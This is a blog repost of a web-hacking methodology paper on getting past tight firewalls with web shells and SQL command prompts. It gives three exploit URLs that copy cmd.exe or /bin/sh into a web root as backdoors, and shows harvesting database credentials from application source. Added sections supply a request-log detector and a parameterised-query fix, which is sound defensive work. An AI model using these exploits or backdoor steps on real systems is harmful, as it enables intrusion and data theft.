Web Page Scenario
Posted on 2 January 2010 by c0decstuff
This technique was formulated to demonstrate that having tight firewalls or SSL does not really matter when it comes to web application attacks. The premise of the one-way technique is that only valid HTTP requests are allowed in and only valid HTTP responses are allowed out of the firewall.
Many other techniques were developed later, and the collection of all these techniques resulted in the creation of a web hacking methodology.
Components of a generic web application system
There are four components in a web application system: usually a web browser client, the front-end web servers, application servers and, for most applications, database servers. The following diagram shows how all the components fit together:
The firewall is assumed to be a tightly configured firewall, allowing nothing but incoming HTTP requests and outgoing HTML replies.
URL mappings to the web application system
While interacting with web applications, the URLs sent back and forth between the browser and the web servers usually have the following format: http://server/path/application?parameters
The following diagram illustrates how the various parts of the URL map to the various regions in the web application system:
- The protocol (http or https) is allowed in and out by the firewall.
- The server and path parts are parsed by the front-end web server. Any vulnerabilities present in URL interpretation (e.g. Unicode, double-decode) can be exploited by tampering with the server and path of the URL.
- The application is executed by the application server with which it is configured or registered. Tampering with this part may result in exploiting vulnerabilities present in the application server (e.g. compiling and executing arbitrary files using the JSP servlet handler).
- Parameters supplied to the application, if not properly validated, may result in vulnerabilities specific to that application (e.g. inserting pipe "|" characters into the open() call in Perl).
Flowchart for a web hack
The attacker has achieved arbitrary command execution, but due to the restrictive firewall, is unable to proceed further into the network. To make an attack effective, two things are essential:
- Interactive terminal access - for running commands to pilfer the attacked server or penetrate further into the network.
- File transfer access - for transferring attack tools such as port scanners, rootkits, etc.
A tight firewall can make it very difficult to achieve the above objectives; however, it is not impossible. To get around these restrictions, with a little bit of web application programming knowledge, we can create a web based command prompt and a file uploader.
Before proceeding further we shall take a preview of the various stages of the one-way hack, as illustrated by the following diagram.
Finding the entry point
We can use any of the common techniques used to attack web servers. We shall present a few examples of various ways of achieving remote command execution based on the different types of URL mappings described previously. A detailed discussion of web server and application vulnerabilities is beyond the scope of this paper. Our objective is to create a backdoor by moving the shell interpreter (/bin/sh, cmd.exe, etc.) to an area within the web server's document root. This way, we can invoke the shell interpreter through a URL. We present three examples which illustrate how to create backdoors using various exploitation techniques.
The diagram below illustrates some of the techniques used to find an entry point:
Exploiting URL parsing
The URL below copies the command interpreter - cmd.exe - into the "scripts/" directory within the web server's document root:
http://www1.example.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts
Exploiting poorly validated input parameters
In this example, an unchecked parameter is passed from the URL to a Perl CGI script, news.cgi, which uses it in an open() call in an insecure manner:
http://www2.example.com/cgi-bin/news.cgi?story=101003.txt|cp+/bin/sh+/usr/local/apache/cgi-bin/sh.cgi|
Exploiting SQL injection
Here, we show how SQL injection can be used to invoke a stored procedure on a database server, and run commands via the stored procedure:
http://www3.example.com/product.asp?id=5%01EXEC+master..xp_cmdshell+'copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\'
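The three entry points above (overlong-UTF-8 traversal in the path, a pipe character fed to a CGI parameter, and a stored-procedure call smuggled through a query-string value) all leave a recognisable trace in the web server's request log. The following is an added example, not code from the original paper: a small triage script that percent-decodes each request target the way a double-decoding server would, checks the path for overlong UTF-8 and ".." segments, and checks the parameters for shell metacharacters, control characters and EXEC/xp_cmdshell patterns. The log lines are constructed for the example and the hostnames, tag names and regular expressions are the script's own choices.

```python
"""Request-line triage for the three entry-point patterns described above.

Added example (not code from the original paper): it scans web-server
request lines for URL-parsing abuse (overlong UTF-8, double percent-encoding,
'..' traversal), shell metacharacters in CGI parameters, and SQL injection that
reaches a stored procedure. The log lines below are constructed for this example.
"""
import re
from urllib.parse import parse_qsl, unquote, unquote_to_bytes, urlsplit

# Constructed request lines (method, target, version); none refers to a real host.
SAMPLE_REQUESTS = [
    "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+c:\\winnt\\system32\\cmd.exe+c:\\inetpub\\scripts HTTP/1.0",
    "GET /cgi-bin/news.cgi?story=101003.txt|cp+/bin/sh+/usr/local/apache/cgi-bin/sh.cgi| HTTP/1.0",
    "GET /product.asp?id=5%01EXEC+master..xp_cmdshell+'dir' HTTP/1.0",
    "GET /product.asp?id=5 HTTP/1.0",
    "GET /scripts/%252e%252e/%252e%252e/winnt/system32/cmd.exe?/c+dir HTTP/1.0",
]

# Overlong UTF-8 forms (C0/C1 lead bytes, E0 with a short continuation) are never
# produced by a correct encoder, so any occurrence is a decoding trick.
OVERLONG = re.compile(rb"[\xc0\xc1][\x80-\xbf]|\xe0[\x80-\x9f][\x80-\xbf]")
TRAVERSAL = re.compile(rb"(?:^|[/\\])\.\.(?:[/\\]|$)")
SHELL_META = re.compile(r"[|;`\n]|\$\(")                   # characters that end or chain a shell command
CONTROL = re.compile(r"[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]")  # e.g. the %01 used to split the SQL token
SQL_EXEC = re.compile(
    r"\bexec(?:ute)?\b.*\bxp_cmdshell\b|\bunion\b\s+\bselect\b|;\s*(?:drop|shutdown)\b",
    re.IGNORECASE | re.DOTALL,
)
INTERPRETER = re.compile(r"cmd\.exe|/bin/sh\b|/bin/bash\b|command\.com", re.IGNORECASE)


def decode_twice(component: str) -> tuple[bytes, bytes]:
    """Percent-decode once and twice, as a server that double-decodes would see it."""
    once = unquote_to_bytes(component)
    return once, unquote_to_bytes(once)


def classify(request_line: str) -> list[str]:
    """Return the sorted list of findings for one request line ([] when clean)."""
    _method, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)
    tags: set[str] = set()

    once, twice = decode_twice(parts.path)
    if OVERLONG.search(once):
        tags.add("overlong-utf8")
    if once != twice:                     # a second decoding pass changed the path
        tags.add("double-encoding")
    # Treat the overlong slash forms as real separators before looking for "..".
    flat = twice.replace(b"\xc0\xaf", b"/").replace(b"\xc1\x9c", b"\\")
    if TRAVERSAL.search(flat):
        tags.add("path-traversal")

    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        for field in (name, value):
            if SHELL_META.search(field):
                tags.add("shell-metachar")
            if CONTROL.search(field):
                tags.add("control-char")
            if SQL_EXEC.search(field):
                tags.add("sql-injection")

    if INTERPRETER.search(unquote(target)):
        tags.add("interpreter-reference")
    return sorted(tags)


def scan(lines: list[str]) -> list[tuple[str, list[str]]]:
    """Return (line, findings) for every line with at least one finding."""
    hits = []
    for line in lines:
        tags = classify(line)
        if tags:
            hits.append((line, tags))
    return hits


if __name__ == "__main__":
    for line, tags in scan(SAMPLE_REQUESTS):
        print(", ".join(tags).ljust(48), line.split(" ", 2)[1][:60])
```

Of the five constructed lines, four are flagged and the plain product.asp?id=5 request is not. The overlong check runs on the once-decoded path because a correctly written decoder rejects those byte sequences outright; the "double-encoding" tag fires whenever a second decoding pass changes the path, which is exactly the condition a double-decoding server gets wrong.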
Invoking the command interpreter
The HTTP POST method is best suited for this purpose. Using POST, the input data gets passed to the invoked resource over standard input, and the web server returns the output generated on standard output back over the HTTP connection. We shall illustrate how to send commands to command interpreters over POST with two examples: one for CMD.EXE on IIS and Windows NT, and the other for sh.
Web based SQL Command Prompts
One-way hacking can be extended to areas other than file transfer and remote command execution via HTTP. One of the most important components in an application is the database. This section shows how we can extend the concept of one-way hacking to interactively control database servers, by creating what are called web based SQL command prompts. Web based SQL command prompts allow a user to connect to a database server via an HTML interface, and execute SQL queries on the back-end database through an HTML form.
The web based SQL command prompt uses the same techniques as any database driven web application would use. Web programming languages such as PHP and ASP provide functionality to connect to back-end databases.
In many cases, once a web server has been compromised, an attacker would generally look at the source code and application configuration files hosted on the web server to figure out where the database lies, and the credentials to access it. This knowledge can be used when attacking a database using a web based SQL command prompt.
Anatomy of an SQL command prompt - sqlquery.asp
There are five key input areas in this form:
| Field | Description |
| --- | --- |
| Server Name | The symbolic name or IP address of the database server. In most cases, the database server is an entirely different system from the web server. |
| Database Name | The name of the database out of the collection of databases hosted on the database server. |
| User Name | The database user whose credentials will be used when establishing the database connection. |
| Password | Password for the database user. Generally, the database user and password are recovered by inspecting the application source code and configuration files hosted on the compromised web server. |
| Query String | The SQL query that is to be sent to and executed on the database. |
The other two parameters, Driver and Connection String, are used for selecting the proper driver and path for the database. Connection String is an optional parameter. In sqlquery.asp, we have the option of connecting via four drivers, namely Microsoft SQL Server, Oracle over ODBC, MySQL over ODBC and FoxPro. More drivers can be added very easily.
An example - IIS and MS SQL server
We now present a scenario showing how sqlquery.asp can be used in hacking database servers which lie on an internal network. The diagram below shows the application layout of the web server, www1.example.com, and the database server 10.0.1.2.
We assume that www1.example.com has already been compromised and that a web based file uploader, upload.asp, and a web based command prompt, cmdasp.asp, are present on it. We make no assumptions about privilege escalation.
Pilfering the web application
Before we can connect to the back-end database, we need to know how to establish a connection to the database, and with what credentials. Upon inspecting the source code of the web application hosted on www1.example.com, the following lines were found:
' Connection string found in the application source: the internal database address and hard-coded sa credentials
Set Con = Server.CreateObject("ADODB.Connection")
Con.Open "Provider=SQLOLEDB; Data Source=10.0.1.2; Initial Catalog=art; User Id=sa; Password=sys+adm!n"
' The ID query-string value is concatenated straight into the SQL statement; this is the injection point
Set RS = Con.Execute("select StockNumber,Name,Description,Artist,ListPrice,image from PRODUCTS where ID = " + Request.QueryString("ID"))
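The two findings in that snippet are the hard-coded sa credentials and the string concatenation of Request.QueryString("ID") into the SQL text; the second is what makes the product.asp?id= injection earlier in the paper possible. The following is an added example, not code from the original paper or from the example application: it rebuilds the PRODUCTS lookup in Python against an in-memory SQLite database (constructed rows) so that the concatenated query and a parameterised, type-checked query can be run side by side on the same input. The table columns and sample rows are assumptions made for the example.

```python
"""Why the pilfered ASP query is injectable, and the parameterised alternative.

Added example, not from the original paper or the example application: it
rebuilds the PRODUCTS lookup from the ASP snippet above in Python on an
in-memory SQLite database (constructed sample rows), so both behaviours can
be observed without a SQL Server instance.
"""
import sqlite3


def build_db() -> sqlite3.Connection:
    """Create the PRODUCTS table with three constructed rows."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE PRODUCTS (ID INTEGER PRIMARY KEY, StockNumber TEXT, "
        "Name TEXT, Artist TEXT, ListPrice REAL)"
    )
    con.executemany(
        "INSERT INTO PRODUCTS VALUES (?, ?, ?, ?, ?)",
        [
            (4, "SN-0004", "Harbour at Dusk", "A. Example", 120.0),
            (5, "SN-0005", "Blue Study", "B. Example", 95.0),
            (6, "SN-0006", "Still Life", "C. Example", 210.0),
        ],
    )
    return con


def lookup_concat(con: sqlite3.Connection, user_id: str) -> list[tuple]:
    """Mirror of the ASP code: the query-string value is glued into the SQL text."""
    sql = "SELECT StockNumber, Name, ListPrice FROM PRODUCTS WHERE ID = " + user_id
    return con.execute(sql).fetchall()


def lookup_param(con: sqlite3.Connection, user_id: str) -> list[tuple]:
    """Hardened form: validate the type first, then bind the value as a parameter.

    The SQL text is fixed; the driver sends the value separately, so nothing in
    it can change the statement's structure.
    """
    if not user_id.isdigit():
        raise ValueError("ID must be a positive integer")
    return con.execute(
        "SELECT StockNumber, Name, ListPrice FROM PRODUCTS WHERE ID = ?",
        (int(user_id),),
    ).fetchall()


def demo() -> dict:
    """Run both lookups with a normal ID and with an injected value."""
    con = build_db()
    injected = "5 OR 1=1"        # a tautology appended to the numeric ID
    result = {
        "concat_normal": len(lookup_concat(con, "5")),
        "concat_injected": len(lookup_concat(con, injected)),
        "param_normal": len(lookup_param(con, "5")),
    }
    try:
        lookup_param(con, injected)
        result["param_injected"] = "accepted"
    except ValueError:
        result["param_injected"] = "rejected"
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:16} {value}")
```

With the concatenated form the injected value returns every row of the table instead of one; the parameterised form returns the single row for a valid ID and refuses the injected string before it reaches the database. The other finding, the sa login and its password sitting in page source, is a configuration matter rather than a code change: the application should connect with a least-privilege database login and read its credentials from outside the document root, so that a compromised web server does not hand over the database as well.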
author : mc2_s3lector
Source: netsquare